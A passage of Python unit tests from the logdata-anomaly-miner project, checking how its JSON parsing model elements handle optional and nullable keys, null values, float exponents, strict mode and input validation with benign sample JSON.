b'{"key": "another not matching value"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3get_match_element_with_allow_all(self): """Test a simplified key_parser_dict with ALLOW_ALL.""" json_model_element = JsonModelElement(self.id_, self.key_parser_dict_allow_all) data = self.single_line_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = self.multi_line_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = self.everything_new_line_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) def test4get_match_element_with_nullable_values(self): """Test if nullable values are working as intended.""" # test functionality with objects key_parser_dict = {"+a": DummyFixedDataModelElement("a", b"a")} json_model_element = JsonModelElement(self.id_, key_parser_dict) data_null = b'{"a": null}' data_empty = b"{}" data = b'{"a": "a"}' data_object_null = b'{"a": {"b": null}}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) value = json.loads(data_null) match_context = DummyMatchContext(data_null) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_null, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) # test with null value key_parser_dict = {"+a": DummyFixedDataModelElement("a", b"null")} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"a": "null"}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) value = json.loads(data_null) match_context = DummyMatchContext(data_null) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_null, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) # test with null key key_parser_dict = {"+null": DummyFixedDataModelElement("a", b"null")} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"null": "null"}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) null = b'{"null": null}' value = json.loads(null) match_context = DummyMatchContext(null) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( null, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) # test functionality with arrays key_parser_dict = {"+a": [DummyFixedDataModelElement("a", b"a")]} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"a": ["a"]}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) value = json.loads(data_null) match_context = DummyMatchContext(data_null) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_null, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) # test functionality with json dicts key_parser_dict = {"+a": {"b": DummyFixedDataModelElement("b", b"b")}} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"a": {"b": "b"}}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) value = json.loads(data_null) match_context = DummyMatchContext(data_null) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_null, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) # no match with null in object key_parser_dict = {"+a": {"b": DummyFixedDataModelElement("b", b"null")}} json_model_element = JsonModelElement(self.id_, key_parser_dict) match_context = DummyMatchContext(data_object_null) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data_object_null, match_element, match_context) # test interchangeability with optional_key_prefix key_parser_dict = {"+optional_key_a": DummyFixedDataModelElement("a", b"a")} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"a": "a"}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) value = json.loads(data_null) match_context = DummyMatchContext(data_null) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_null, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) value = json.loads(data_empty) match_context = DummyMatchContext(data_empty) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_empty, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) key_parser_dict = {"optional_key_+a": DummyFixedDataModelElement("a", b"a")} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"a": "a"}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) value = json.loads(data_null) match_context = DummyMatchContext(data_null) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_null, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) value = json.loads(data_empty) match_context = DummyMatchContext(data_empty) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_empty, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) def test5get_match_element_null_value(self): """Test if null keys and values can be used.""" key_parser_dict = { "works": DummyFirstMatchModelElement("id", [ DummyFixedDataModelElement("abc", b"abc"), DummyFixedDataModelElement("123", b"123")]), "null": "NULL_OBJECT" } data1 = b"""{ "works": "123", "null": null }""" data2 = b"""{"a": {"b": "c"}}""" data3 = b"""{"a": null}""" json_model_element = JsonModelElement(self.id_, key_parser_dict) data = data1 value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) key_parser_dict = {"a": {"b": DummyFixedDataModelElement("c", b"c")}} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = data2 value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = data3 match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test6get_match_element_with_umlaut(self): """Test if ä ö ü are used correctly.""" key_parser_dict = {"works": DummyFixedDataModelElement("abc", "a ä ü ö z".encode("utf-8"))} data = """{ "works": "a ä ü ö z" }""".encode("utf-8") json_model_element = JsonModelElement(self.id_, key_parser_dict) value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) def test7get_match_element_same_value_as_key(self): """Test if object with the same key-value pairs are parsed correctly.""" key_parser_dict = {"abc": DummyFirstMatchModelElement("first", [ DummyFixedDataModelElement("abc", b"abc"), DummyFixedDataModelElement("abc", b"ab"), DummyFixedDataModelElement("abc", b"bc"), DummyFixedDataModelElement("abc", b"ba"), DummyFixedDataModelElement("abc", b"b"), DummyFixedDataModelElement("abc", b"d")])} data = b"""{"abc":"abc"}""" json_model_element = JsonModelElement(self.id_, key_parser_dict) value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b"""{"abc":"ab"}""" json_model_element = JsonModelElement(self.id_, key_parser_dict) value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b"""{"abc":"bc"}""" json_model_element = JsonModelElement(self.id_, key_parser_dict) value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b"""{"abc":"b"}""" json_model_element = JsonModelElement(self.id_, key_parser_dict) value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b"""{"abc":"d"}""" json_model_element = JsonModelElement(self.id_, key_parser_dict) value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b"""{"abc":"ba"}""" json_model_element = JsonModelElement(self.id_, key_parser_dict) value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) def test8get_match_element_empty_array_empty_object_null(self): """Test if the keywords EMPTY_ARRAY, EMPTY_OBJECT, EMPTY_STRING, and None NULL_OBJECT work properly.""" key_parser_dict = {"menu": { "id": "EMPTY_OBJECT", "value": "EMPTY_ARRAY", "popup": { "menuitem": [{ "value": "NULL_OBJECT", "onclick": DummyFirstMatchModelElement("buttonOnclick", [ DummyFixedDataModelElement("create_new_doc", b"CreateNewDoc()"), DummyFixedDataModelElement("open_doc", b"OpenDoc()"), DummyFixedDataModelElement("close_doc", b"CloseDoc()")]), "optional_key_clickable": DummyFirstMatchModelElement("clickable", [ DummyFixedDataModelElement("true", b"true"), DummyFixedDataModelElement("false", b"false")]) }] }}, "a": "EMPTY_ARRAY", "b": "EMPTY_OBJECT", "c": "EMPTY_STRING" } json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"menu": {"id": {}, "value": [], "popup": {"menuitem": [{"value": null, "onclick": "CreateNewDoc()"}, {"value": null, ' \ b'"onclick": "OpenDoc()"}, {"value": null, "onclick": "CloseDoc()"}]}}, "a": [], "b": {}, "c": ""}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b'{"menu": {"id": {\n}, "value": [\n], "popup": {"menuitem": [{"value": null, "onclick": "CreateNewDoc()"}, {"value": ' \ b'null, "onclick": "OpenDoc()"}, {"value": null, "onclick": "CloseDoc()"}]}}, "a": [], "b": {}, "c": ""}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b'{"menu": {"id": {}, "value": [], "popup": {"menuitem": []}}, "a": [], "b": {}, "c": ""}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) JsonModelElement(self.id_, {"a": "EMPTY_ARRAY"}) JsonModelElement(self.id_, {"a": "EMPTY_OBJECT"}) JsonModelElement(self.id_, {"a": "EMPTY_STRING"}) data = b'{"menu": {"id": {}, "value": [], "popup": {"menuitem": [{"value": null, "onclick": "CreateNewDoc()"}, {"value": null, ' \ b'"onclick": "OpenDoc()"}, {"value": null, "onclick": "CloseDoc()"}]}}, "a": ["a"], "b": {}, "c": ""}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b'{"menu": {"id": {}, "value": [], "popup": {"menuitem": [{"value": null, "onclick": "CreateNewDoc()"}, {"value": null, ' \ b'"onclick": "OpenDoc()"}, {"value": null, "onclick": "CloseDoc()"}]}}, "a": [], "b": {"a": "a"}, "c": ""}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b'{"menu": {"id": {}, "value": [], "popup": {"menuitem": [{"value": null, "onclick": "CreateNewDoc()"}, {"value": null, ' \ b'"onclick": "OpenDoc()"}, {"value": null, "onclick": "CloseDoc()"}]}}, "a": [], "b": {}, "c": "ab"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) key_parser_dict = {"ALLOW_ALL_KEYS": DummyFirstMatchModelElement("first", [ DummyFixedDataModelElement("abc", b"abc"), DummyFixedDataModelElement("123", b"123")])} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"key1": "abc", "afd": "abc", "1234": "123", "&544": "123"}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) def test9get_match_element_float_exponents(self): """ Parse float values with exponents. The principle of only testing dummy classes can not be applied here, as the functionality between the JsonModelElement and DecimalFloatValueModelElement must be tested directly. """ json_model_element = JsonModelElement(self.id_, { "a": DecimalFloatValueModelElement(self.id_, exponent_type=DecimalFloatValueModelElement.EXP_TYPE_OPTIONAL), "b": DecimalFloatValueModelElement(self.id_, exponent_type=DecimalFloatValueModelElement.EXP_TYPE_OPTIONAL)}) def format_float(val): """ This function formats the float-value and parses the sign and the exponent """ exp = None if "e" in val: exp = "e" elif "E" in val: exp = "E" if "+" in val: sign = "+" else: sign = "-" if exp is not None: pos_point = val.find(exp) if "." in val: pos_point = val.find(".") if len(val) - val.find(sign) <= 2: result = format(float(val), "1.%dE" % (val.find(exp) - pos_point))[:-2] result += format(float(val), "1.%dE" % (val.find(exp) - pos_point))[-1] return result return format(float(val), "1.%dE" % (val.find(exp) - pos_point)) return float(val) data = b'{"a": 111.1, "b": 111.1}' value = json.loads(data, parse_float=format_float) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b'{"a": 1E-01, "b": 111.1}' value = json.loads(data, parse_float=format_float) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b'{"a": 111.1, "b": 1E-1}' value = json.loads(data, parse_float=format_float) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b'{"a": 1E-1, "b": 1E-1}' value = json.loads(data, parse_float=format_float) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) def test10get_match_element_allow_all_fields(self): """Parse matching substring from MatchContext using the allow_all_fields parameter.""" json_model_element = JsonModelElement(self.id_, self.key_parser_dict_allow_all_fields, allow_all_fields=True) data = self.single_line_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.key_parser_dict_allow_all_fields, allow_all_fields=False) data = self.single_line_json match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test11get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" json_model_element = JsonModelElement(self.id_, self.key_parser_dict) # missing key data = self.single_line_missing_key_json match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # object instead of array data = self.single_line_object_instead_of_array match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # invalid json data = self.single_line_invalid_json match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # child not matching data = self.single_line_no_match_json match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # all keys missing data = b"{}" match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) json_model_element = JsonModelElement(self.id_, self.empty_key_parser_dict) data = b"[]" match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"{[]}" match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b'{"key": []}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) key_parser_dict = {"a": [{"b": DummyFixedDataModelElement("b", b"ef")}]} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"a": [{"b": "fe"}]}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) key_parser_dict = {"a": [DummyFixedDataModelElement("a", b"gh")]} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"a": ["hg"]}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) key_parser_dict = {"a": {"b": DummyFixedDataModelElement("c", b"c")}} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"a": "b"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test12element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, JsonModelElement, "", self.key_parser_dict) # empty element_id self.assertRaises(TypeError, JsonModelElement, None, self.key_parser_dict) # None element_id self.assertRaises(TypeError, JsonModelElement, b"path", self.key_parser_dict) # bytes element_id is not allowed self.assertRaises(TypeError, JsonModelElement, True, self.key_parser_dict) # boolean element_id is not allowed self.assertRaises(TypeError, JsonModelElement, 123, self.key_parser_dict) # integer element_id is not allowed self.assertRaises(TypeError, JsonModelElement, 123.22, self.key_parser_dict) # float element_id is not allowed self.assertRaises(TypeError, JsonModelElement, {"id": "path"}, self.key_parser_dict) # dict element_id is not allowed self.assertRaises(TypeError, JsonModelElement, ["path"], self.key_parser_dict) # list element_id is not allowed self.assertRaises(TypeError, JsonModelElement, [], self.key_parser_dict) # empty list element_id is not allowed self.assertRaises(TypeError, JsonModelElement, (), self.key_parser_dict) # empty tuple element_id is not allowed self.assertRaises(TypeError, JsonModelElement, set(), self.key_parser_dict) # empty set element_id is not allowed def test13key_parser_dict_input_validation(self): """Check if key_parser_dict is validated.""" self.assertRaises(TypeError, JsonModelElement, self.id_, "path") # string key_parser_dict self.assertRaises(TypeError, JsonModelElement, self.id_, None) # None key_parser_dict self.assertRaises(TypeError, JsonModelElement, self.id_, b"path") # bytes key_parser_dict is not allowed self.assertRaises(TypeError, JsonModelElement, self.id_, True) # boolean key_parser_dict is not allowed self.assertRaises(TypeError, JsonModelElement, self.id_, 123) # integer key_parser_dict is not allowed self.assertRaises(TypeError, JsonModelElement, self.id_, 123.22) # float key_parser_dict is not allowed # dict key_parser_dict with no ModelElementInterface values is not allowed self.assertRaises(TypeError, JsonModelElement, self.id_, {"id": "path"}) # dict key_parser_dict with list of other lengths than 1 is not allowed. key_parser_dict = copy.deepcopy(self.key_parser_dict) key_parser_dict["menu"]["popup"]["menuitem"] = [] self.assertRaises(ValueError, JsonModelElement, self.id_, key_parser_dict) self.assertRaises(TypeError, JsonModelElement, self.id_, ["path"]) # list key_parser_dict is not allowed self.assertRaises(TypeError, JsonModelElement, self.id_, []) # empty list key_parser_dict is not allowed self.assertRaises(TypeError, JsonModelElement, self.id_, ()) # empty tuple key_parser_dict is not allowed self.assertRaises(TypeError, JsonModelElement, self.id_, set()) # empty set key_parser_dict is not allowed def test14optional_key_prefix_input_validation(self): """Check if optional_key_prefix is validated.""" self.assertRaises(ValueError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix="") self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=None) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=b"path") self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=True) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=123) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=123.22) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix={"id": "path"}) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=["path"]) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=[]) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=()) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix=set()) def test15nullable_key_prefix_input_validation(self): """Check if optional_key_prefix is validated.""" self.assertRaises(ValueError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix="") self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=None) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=b"path") self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=True) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=123) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=123.22) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix={"id": "path"}) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=["path"]) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=[]) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=()) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, nullable_key_prefix=set()) def test16allow_all_fields_input_validation(self): """Check if allow_all_fields is validated.""" self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields="") self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=None) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=b"path") self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=123) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=123.22) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields={"id": "path"}) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=["path"]) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=[]) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=()) self.assertRaises(TypeError, JsonModelElement, self.id_, self.key_parser_dict, allow_all_fields=set()) def test17get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = JsonModelElement(self.id_, self.key_parser_dict) data = b"abcdefghijklmnopqrstuvwxyz.!?" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) def test18same_optional_key_and_nullable_key_prefix(self): """Test if an exception is thrown if the optional_key_prefix is the same as the nullable_key_prefix.""" self.assertRaises(ValueError, JsonModelElement, self.id_, self.key_parser_dict, optional_key_prefix="+", nullable_key_prefix="+") if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/JsonStringModelElementTest.py000066400000000000000000000235371437606560100312460ustar00rootroot00000000000000import copy import unittest import json from aminer.parsing.JsonStringModelElement import JsonStringModelElement, JsonAccessObject from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummyFirstMatchModelElement class JsonStringModelElementTest(TestBase): """Unittests for the JsonStringModelElement.""" id_ = "json" path = "path" strict = False ignore_null = True def test1get_id(self): """Test if get_id works properly.""" host = DummyFixedDataModelElement("host", b"www.google.com") user = DummyFixedDataModelElement("user", b"foobar") key_parser_dict = { "host": host, "user": user } json_me = JsonStringModelElement(self.id_, key_parser_dict, self.strict, self.ignore_null) self.assertEqual(json_me.get_id(), self.id_) def test2get_match_element_valid_match(self): """Parses a json-file and compares if the configured ModelElements are parsed properly""" host = DummyFixedDataModelElement("host", b"www.google.com") user = DummyFixedDataModelElement("user", b"foobar") key_parser_dict = { "host": host, "user": user } json_model_element = JsonStringModelElement(self.id_, key_parser_dict, self.strict, self.ignore_null) data = b'{"host": "www.google.com", "user": "foobar", "one": "two"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.assertEqual(2, len(match_element.children)) self.assertEqual(b"www.google.com", match_element.children[0].get_match_object()) self.assertEqual(b"foobar", match_element.children[1].get_match_object()) def test3strict_mode(self): """Parses a json-file and compares if the configured ModelElements are parsed properly with strict_mode""" host = DummyFixedDataModelElement("host", b"www.google.com") user = DummyFixedDataModelElement("user", b"foobar") path = DummyFixedDataModelElement("path", b"/index.html") key_parser_dict = { "host": { "server": host }, "user": user } # Sets strict_mode to True json_model_element = JsonStringModelElement(self.id_, key_parser_dict, True, self.ignore_null) # "one": "two" is too much data = b'{"host": {"server": "www.google.com"}, "user": "foobar", "one": "two"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.assertEqual(None,match_element) # Sets one more element key_parser_dict = { "host": { "server": host }, "user": user, "path": path } # Sets strict_mode to True json_model_element = JsonStringModelElement(self.id_, key_parser_dict, True) # "one": "two" is too much data = b'{"host": {"server": "www.google.com"}, "user": "foobar", "one": "two"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.assertEqual(None,match_element) # Sets the logdata to the exact configuration-json. data = b'{"host": {"server": "www.google.com"}, "user": "foobar", "path": "/index.html"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.assertEqual(3,len(match_element.children)) self.assertEqual(b"www.google.com", match_element.children[0].get_match_object()) 